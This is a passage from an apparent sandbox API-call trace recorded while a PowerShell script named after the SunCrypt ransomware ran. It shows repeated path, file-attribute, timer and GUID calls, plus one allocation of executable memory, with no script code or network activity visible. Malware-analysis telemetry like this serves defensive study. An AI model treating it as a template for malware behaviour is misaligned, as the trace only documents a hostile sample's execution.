lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.235] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701705153873) returned 1 [0104.235] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.235] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.235] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.235] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.280] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.287] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701710375118) returned 1 [0104.287] EtwEventActivityIdControl () returned 0x0 [0104.287] EtwEventActivityIdControl () returned 0x0 [0104.287] EtwEventActivityIdControl () returned 0x0 [0104.288] EtwEventActivityIdControl () returned 0x0 [0104.288] VirtualAlloc (lpAddress=0x0, dwSize=0x10c04, flAllocationType=0x1000, flProtect=0x40) returned 0x44d0000 [0104.289] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xf78c5b71, Data2=0x82e6, Data3=0x41d6, Data4=([0]=0xbd, [1]=0xcd, [2]=0xa8, [3]=0x75, [4]=0x21, [5]=0x62, [6]=0x3b, [7]=0x16))) returned 0x0 [0104.290] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.290] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701710661318) returned 1 [0104.290] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.290] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.290] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.291] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.291] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.292] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701710835510) returned 1 [0104.292] EtwEventActivityIdControl () returned 0x0 [0104.292] EtwEventActivityIdControl () returned 0x0 [0104.292] EtwEventActivityIdControl () returned 0x0 [0104.292] EtwEventActivityIdControl () returned 0x0 [0104.292] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xad942138, Data2=0x6521, Data3=0x4ede, Data4=([0]=0x9a, [1]=0x8d, [2]=0x89, [3]=0x91, [4]=0xb, [5]=0x7e, [6]=0xda, [7]=0xec))) returned 0x0 [0104.293] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.293] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701710996584) returned 1 [0104.293] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.294] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.294] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.294] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.294] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.299] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701711586191) returned 1 [0104.299] EtwEventActivityIdControl () returned 0x0 [0104.299] EtwEventActivityIdControl () returned 0x0 [0104.299] EtwEventActivityIdControl () returned 0x0 [0104.300] EtwEventActivityIdControl () returned 0x0 [0104.300] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xa553d44b, Data2=0xe153, Data3=0x4841, Data4=([0]=0xb5, [1]=0x6e, [2]=0x6e, [3]=0x3d, [4]=0xc9, [5]=0x64, [6]=0x68, [7]=0x32))) returned 0x0 [0104.300] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.301] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701711720649) returned 1 [0104.301] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.301] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.301] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.301] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.301] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.301] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.303] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701712233967) returned 1 [0104.306] EtwEventActivityIdControl () returned 0x0 [0104.306] EtwEventActivityIdControl () returned 0x0 [0104.306] EtwEventActivityIdControl () returned 0x0 [0104.306] EtwEventActivityIdControl () returned 0x0 [0104.306] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x8f2c8929, Data2=0x2077, Data3=0x486f, Data4=([0]=0xaf, [1]=0x50, [2]=0x3, [3]=0x24, [4]=0x6e, [5]=0xad, [6]=0x20, [7]=0x7a))) returned 0x0 [0104.307] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.307] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701712371093) returned 1 [0104.307] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.307] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.307] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.307] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.308] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.308] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.310] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701712695778) returned 1 [0104.310] EtwEventActivityIdControl () returned 0x0 [0104.311] EtwEventActivityIdControl () returned 0x0 [0104.311] EtwEventActivityIdControl () returned 0x0 [0104.311] EtwEventActivityIdControl () returned 0x0 [0104.311] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xaecc9af0, Data2=0xfac6, Data3=0x47e3, Data4=([0]=0xa4, [1]=0xd3, [2]=0xd1, [3]=0x9a, [4]=0xec, [5]=0xf, [6]=0x8d, [7]=0x17))) returned 0x0 [0104.312] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.312] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701712848838) returned 1 [0104.312] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.312] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.312] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.312] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.313] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.315] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701713175105) returned 1 [0104.315] EtwEventActivityIdControl () returned 0x0 [0104.315] EtwEventActivityIdControl () returned 0x0 [0104.315] EtwEventActivityIdControl () returned 0x0 [0104.316] EtwEventActivityIdControl () returned 0x0 [0104.316] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xb09b5c42, Data2=0x6f7a, Data3=0x4c28, Data4=([0]=0x84, [1]=0xac, [2]=0xd1, [3]=0xfc, [4]=0x47, [5]=0x57, [6]=0x45, [7]=0x7b))) returned 0x0 [0104.316] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.317] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701713333079) returned 1 [0104.317] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.317] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.317] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.317] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.317] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.326] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701714239034) returned 1 [0104.326] EtwEventActivityIdControl () returned 0x0 [0104.326] EtwEventActivityIdControl () returned 0x0 [0104.326] EtwEventActivityIdControl () returned 0x0 [0104.326] EtwEventActivityIdControl () returned 0x0 [0104.326] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x64ea463a, Data2=0x5585, Data3=0x4f43, Data4=([0]=0x94, [1]=0x6, [2]=0x18, [3]=0xe8, [4]=0xbb, [5]=0x21, [6]=0x4e, [7]=0xbf))) returned 0x0 [0104.327] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.327] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701714387215) returned 1 [0104.327] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.327] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.327] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.328] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.328] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.328] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.328] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.331] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701714791748) returned 1 [0104.331] EtwEventActivityIdControl () returned 0x0 [0104.332] EtwEventActivityIdControl () returned 0x0 [0104.332] EtwEventActivityIdControl () returned 0x0 [0104.332] EtwEventActivityIdControl () returned 0x0 [0104.332] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x1a5be49a, Data2=0xfe05, Data3=0x40d5, Data4=([0]=0x9f, [1]=0x32, [2]=0xae, [3]=0xff, [4]=0x10, [5]=0xce, [6]=0x41, [7]=0xf8))) returned 0x0 [0104.333] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.333] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701714958251) returned 1 [0104.333] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.333] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.333] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.333] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.334] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.334] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.338] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701715459400) returned 1 [0104.338] EtwEventActivityIdControl () returned 0x0 [0104.338] EtwEventActivityIdControl () returned 0x0 [0104.338] EtwEventActivityIdControl () returned 0x0 [0104.338] EtwEventActivityIdControl () returned 0x0 [0104.338] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xdfc02cf4, Data2=0x5122, Data3=0x4b34, Data4=([0]=0x94, [1]=0x8b, [2]=0x17, [3]=0x5b, [4]=0x27, [5]=0x84, [6]=0x8e, [7]=0xb9))) returned 0x0 [0104.339] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.339] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701715581978) returned 1 [0104.339] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.339] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: 